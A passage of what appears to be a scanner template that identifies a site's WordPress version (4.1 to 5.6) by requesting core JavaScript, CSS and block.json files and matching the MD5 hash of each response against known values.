5.4.4 - dsl: - - "(\"db84831d55cfdc51f2075773c00912a2\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"fa2ec0ed8220902d50cb63f6fee7366d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"f4625750128afe29806e059d8bdfc89b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/primitives.min.js" - matchers: - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b70293a44a87ef96f637a3ff1acfc953\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"2ddfbe528847785917cb8314634786d9\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"7982311ac531784ab798c99884ccdcde\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/keyboard-shortcuts.min.js" - matchers: - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"be47a44af031a2f1a43344b4a44b109d\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0ad6c510e007f87d0a3bf8ad111377a5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"02c511abc7b66279bb9215c9659984e2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/warning.js" - matchers: - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"1b2a453cfcaaff346039ed7f5ea57295\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"7fba13943ca2930a4e770b309a02cd2a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"68b1863f629cb550f0fdb6d5620081c7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/block-directory.js" - matchers: - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"a8ec7b77bde5f5059dc94054b07cf6f4\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"4876f234deeedb192153d6293b0245d2\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c7f462e97c803fceef094806d711a664\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/primitives.js" - matchers: - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"5bf9f9a06b6d328e64e577074b404805\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"4e440209ae2331748dd08e417c3a7d59\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"1258f4c2c0ddc004a90ad76d4bb03032\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/keyboard-shortcuts.js" - matchers: - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"760c1b3492ab6365c275bfc2a77ae176\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"6ecee2ba7a57ae5437f6b9a8aa3e10dc\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d8006549ce04ebfc622625a691c1abe1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/block-directory.min.js" - matchers: - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"d832c5cd8bd0da9512d8848863fa16ed\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0e66af7f7e7dc0b76569010a26590e37\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"04dfad9a3e54344c9de5438d8afaac0c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-directory/style-rtl.min.css" - matchers: - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"09cf9b46feeca59fd0a9382bd232c4c8\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"ab529cd63991c549bc36ce30dd68c660\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d9da8d9eb02483ddebcedf7644794705\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-directory/style.min.css" - matchers: - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"053280c146e2bf08a28230a29faad58f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"1d7929892c1d4955c6183a758c28c48e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"a720f09e5780bea0126c26f2c21082c7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/social-link/block.json" - matchers: - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"6ea2b5c0ac1460e01ba67030b2a81180\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"1558f03f0a0dae63d39d2c69c71bb771\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8c04a371745f9db987ec9a600d1308b7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/shortcode/block.json" - matchers: - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"e911185397e7871463ed951bbdaf1489\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d78388efddb5da069353622bc5b0d7fb\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"fbc8238045192ff64ee68476f008a83a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/selectable.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"b632add191ecae92e6a7b6b97212a640\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"51f19c22fb1d7b1bbf428b4de4f01fce\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"a61647fd50e892d148bf77fab886afd2\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"91167a07312f0c7cf9eadbb6211fa2d5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"df30b5088b7511a63e4e3195c9667a88\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/menu.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"c91cfff50715441295fe7463bb5d3894\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"279b59ffd3e6ed2da1397cb06ce13ec0\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"685fb2f73a372f615a6981a8cd1d2444\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"2bc433c534a14d09f1f8a2d060ebc7eb\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d77da8d28a3e05fb5cbf9af4e4156f34\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/datepicker.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"cfb63dc18fde53fef4d4fdc19ddfdcd6\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"82e28aae0e34a07a0b13ce604d021b14\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"499a4efa077515f0e4025141e22b0290\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"2391c6781dad9871a02cca33c1782f4b\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"70b4930dc8e018f851f8530c330b1456\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c5d96ab0b66c433e5ce4c4d1038612b5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/tooltip.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"443f68690d84eee42cf3019071340730\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"b75d47d283918bef01b8cdcc4045511e\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"c841c027f1139ce197b43a9e4ea65420\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"26c741acbef3207eb8c79483cbc08dde\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"533fcffa5cae261dff515b72f5c0139a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/dialog.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"3ecd9590aac778514f4e69975ed91a62\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"24036156f5137bd484089907f52c9530\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"03468b0f0ceb0ccce25de28ffed83efd\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"d0933f1e5b9b5592dd5e219f7eba2f14\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"add449e75da55bc682631a7f9d12fafc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/draggable.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"443c277789baf69c490019d59c1b36ed\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"500b56f16499ad4010c6cb1159a00ef7\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"b5993b66434a99eb5b6f8cdd716f19d0\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"1b571c6695d5b8dc97ff051254fa953c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"906dfc74dfca0498666bca77e5c6889e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-transfer.min.js" - matchers: - - type: dsl - name: 4.2 - 5.2.9 - dsl: - - "(\"07e5b0dea800777dd2108788b56ef90b\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"70d7ff2b68aa36956b1c7fa6c0b44191\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"2d541c6d1e13a0f9bfbccdc6a68710af\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4adf0d942931b49ff804a3df76f91473\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-pulsate.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"bf836f20530440115a2a8487ca7021c5\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"d31b2660850bd11ed7f4118ee166f1e9\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"0d28e73bb53ab02d4951460898c8ad8c\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"e68aa8b524b4726b33456011f8e08997\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"a1046ab49f04a3d7eeb33d411adbeca3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/core.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"9ce4e157448487d4efe0ca538f656a71\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"204d1573e5f9ad0d0c9b61bdffe4a37b\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"67314499128fc5f9b92a78e2ac93bf89\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"96ff65c925bbaf3e4e7891a7ca1f2b1f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2fea75d1bee862d18064d52a1fca3c37\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/autocomplete.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"d0ff3eba6258651773c3a5cc909efde6\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"87848b50d8b543b6fe1a38a97a6aea5c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"b44ae880533b69eb02aa8bab81bbb2a8\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"db0088d80b66d522e8f56921f2f39ff5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c07e20c3fad464dab1ed4c7b43e33709\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-fade.min.js" - matchers: - - type: dsl - name: 4.2 - 5.2.9 - dsl: - - "(\"9f6fd64f4f5ff5893b7b72a235246d0c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"15a40c47867106bd6f45ac103d00d929\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"8a30f21e345577b420a78c5aba2b3156\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ffc8d22a420c7af0b2baec80164c9ebc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/button.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"2ce99e1ed08df351e6a58eb4b6bcbfa9\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"6e0e045d3fe4766ba1cd3ae5830f5307\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"cb7e87f8ae42aed3689546eaf9566d6c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"68fcb351d6882f64a3e5e2f3d6fd00b3\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"616085fd76fe2c4c2a09d2b94196a669\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"7bced8633b0301e877db79c95101241c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-explode.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"c0df625cca418cfd803a11514a3dd1e6\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"605955a2ff9bbd517d58d90651f730d8\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"80a3c71f73734d8e64568b208b5cfd19\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"2f68b680e67f09ced628d98b2bb456ff\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"07f19a11c69199b50faa6c148c99d4b5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/sortable.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"2896e90cc17e9abc160ed96bb86b07e3\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"0ed316ce58771b0297b783130e6b5e94\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"c9f94c2964fbe89af48d431e721ee4d6\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"efa8171f2226a422003417095d8549dd\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"1f7ccfe2bad939d26a1360cb399aa1e1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-scale.min.js" - matchers: - - type: dsl - name: 4.2 - 5.2.9 - dsl: - - "(\"d57d0830652c29c3e0e301b02b6db754\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"c7dce545dd7b39f2e154c7a69fe1b30f\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"bf1461a382afb5a90e22a0d7d462ff92\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"25377707ee8e989c109d24ee5adafb53\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/mouse.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"82835a8960ddd73020389dbfa45c39a0\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"e4a138275da8ed21bf8e49d9b210b884\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"3b3c95f5fb16cfa309270c16992dc393\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"b317c4ccc9aa140339ad72fa27c77266\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"e741e01a2efcc5372d649eb84035ac30\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/spinner.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"3acf32da612bf35221c09394856591dc\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"b2d7a9df2f6b0f264851faf33b6ac7d6\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"7c2fb4ffa453c9870793dd257109b9b3\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"a597d68b588efa4b8896beea6582c62c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6b95a7525bebb6884e50f3aa0c4dcee4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-bounce.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"4bc4c97924bea4bf7b04d7b46ff4f64c\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"d8967fe0305451de35920fd4fbe18d53\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"60d7f9347ab7938af5cb10ef606453f1\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"030dc5d899ab0c2191629d74281f7781\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c56e07e312d163e6c13f9cea03468890\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/tabs.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"5330c83425ab1b8f67ce63f741427adb\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"4572c6f0dae66c956ef9774756800b92\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"fc67555a859a12b644ff9edaf7926a96\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"9d119a515eff37751a19f95d11c0802d\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"b7d1b47a2c57059631f53e42392f7955\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"61f1c4f2116e6de96e6c01488aa78144\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-shake.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"260cbafcbcedc23348a371cb80083112\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"a0274a6716560eeaccaf0090400f7095\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"ed68bc26b640e7dcaf6e32ea3d3478ed\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"52adac7c5413612aa59472d00bcd0b5c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9805977e847511fd5d0cfd0b0dfdbfd2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-highlight.min.js" - matchers: - - type: dsl - name: 4.2 - 5.2.9 - dsl: - - "(\"95e8ebe62adf187fb4c3b84eb5bef821\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"65d871feccd57666ee19a3df4644a7e0\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"9b1d4283702ba049f9d88e0a75d05f81\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4eba87d378061ff9e0e53a96e96354bf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/accordion.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"334c2ffb0b086ffc0f6f192ea120f3c2\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"617307799c0ec636db3df228d57790da\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"3d655185b6170d7722edad3edbd4eb26\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"e89a7c428e49ea602d7ec04809663edc\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"842a3a86123d41935c2d1821ee89d447\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-clip.min.js" - matchers: - - type: dsl - name: 4.2 - 5.2.9 - dsl: - - "(\"c7939457e8ab231b951713475a056173\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"857396f2d8203aba1028fde0009c92d8\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"e9294b5b7374f173b76b4286b53faf33\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9778614a5172dfe6a8babd4c86e7d3a5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/resizable.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"a5001032177c492cf0ff7c86bc01169f\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"3f04b22aeae2579369c558e39db6d5bf\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"e2d4ab1a66c1ec7615c2e17c15c7e081\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"449c1a605e8c304774ed6336d9a953af\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"5ad69e67648243390058495a8beb5535\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"3f7161cf139d5a2c5e6d34e1c0026f9d\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"1441d6a28c1e7069c1e21b757f2b6082\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"b7642fa0b3ddf241b7b4ee9d62139d76\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"318747d327332bca86b5f101420c4209\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"65b229b1cbc084072342bfa5f4e1d766\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-fold.min.js" - matchers: - - type: dsl - name: 4.2 - 5.2.9 - dsl: - - "(\"8d365ec1b3a7ee82f93c9afd441e456c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"f5854a487c21837903b3e03e5507cf52\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"8785d9de96bad111926ab4d13014d21f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"42a41dbb3565969a5c8e0f0b228aeb30\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-drop.min.js" - matchers: - - type: dsl - name: 4.2 - 5.2.9 - dsl: - - "(\"57fe560887cac7a5b2598188463290e8\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"115186cb516bf141e12b8b8c7f1c5c8d\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"59c7df6dedd02a304f58985e7cfb8e1e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8395ce579e994aa4f9911ae86a071a46\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-size.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"b00e3dfd6eebccd5ea9aeb3293d85a25\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"3a14499e6b9543cd2a85be995dab077f\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"6fd6a0edced7b413d16c500d896d5e0f\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"706b0892dc2ec793f195f2a3f2402edc\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"50efcc245d0569281ad367d8d1ab3745\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/slider.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"9408efe2ce5a6b4364f34cbda02f814b\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"7d09316c34df2686e1515795ef0f4cc8\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"4f70432f595fade3c533070299719285\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"6c55f2f9a18a80fbf2b3a59dd9e8c7f3\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9aacf2600bc8e4f8a62c7fe648f4ddf7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-puff.min.js" - matchers: - - type: dsl - name: 4.2 - 5.2.9 - dsl: - - "(\"fe496d6c9d63bc47854084c8b3fc20d6\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"633a3e818838090cdb8f691545977ece\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"0647cd3b8da74c8c9c1fe7a317137773\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"7d50405c6e2695da78ba318591244fa6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-slide.min.js" - matchers: - - type: dsl - name: 4.2 - 5.2.9 - dsl: - - "(\"fa23475fb01c8f4d56da98ca0c1179b5\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"ab6393ed31d603a7c3b3d723437726a4\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"b3efa3b4e62162ad592e8a8b483b6572\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b13b495e8d1a2b3a4301b9df1829485b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-blind.min.js" - matchers: - - type: dsl - name: 4.2 - 5.2.9 - dsl: - - "(\"addbe09f173c4f1bd86d41ac5f3b4f4c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"6fb2642d8eb51b75a796cb3e92e6ba7e\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"9ade4cd0f3989a69310012f671fe6f8e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9ec8b798f187fb04dd20b2c36da00b37\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/progressbar.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"b94d71da54d9b4413ffa4c7d792269c5\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"a5e9438e7bac8acb9a71ccf4741009cd\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"f953a1f80de38a3aa9b33b9035d8a638\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"34c78c33e7c97e65a369bb0137d93d05\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"1a9b736b90bcfdfdae5aa66a0959100e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/selectmenu.min.js" - matchers: - - type: dsl - name: 4.2 - 5.2.9 - dsl: - - "(\"cb7db4cbaa328e395a680c78692236f0\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"2c771d66d39708f0b0cac4c9922113d2\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"a0934e5723eb9982df8a6b7bf07a751e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4c8c34de3de3167ca6724e0f745e3a76\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/droppable.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"debf5224c4162887d1a6e3198ed953d8\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"1a4b2271fd48cc6494bc94967e41b150\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"0871aadc0992a7c71d5b3558114438fb\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"8c9c1bc0a5e940af40f55e19d39ed9a0\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ee39d7ff1953b6c0b1006271bbd5cbb9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelementplayer.min.css" - matchers: - - type: dsl - name: 4.6 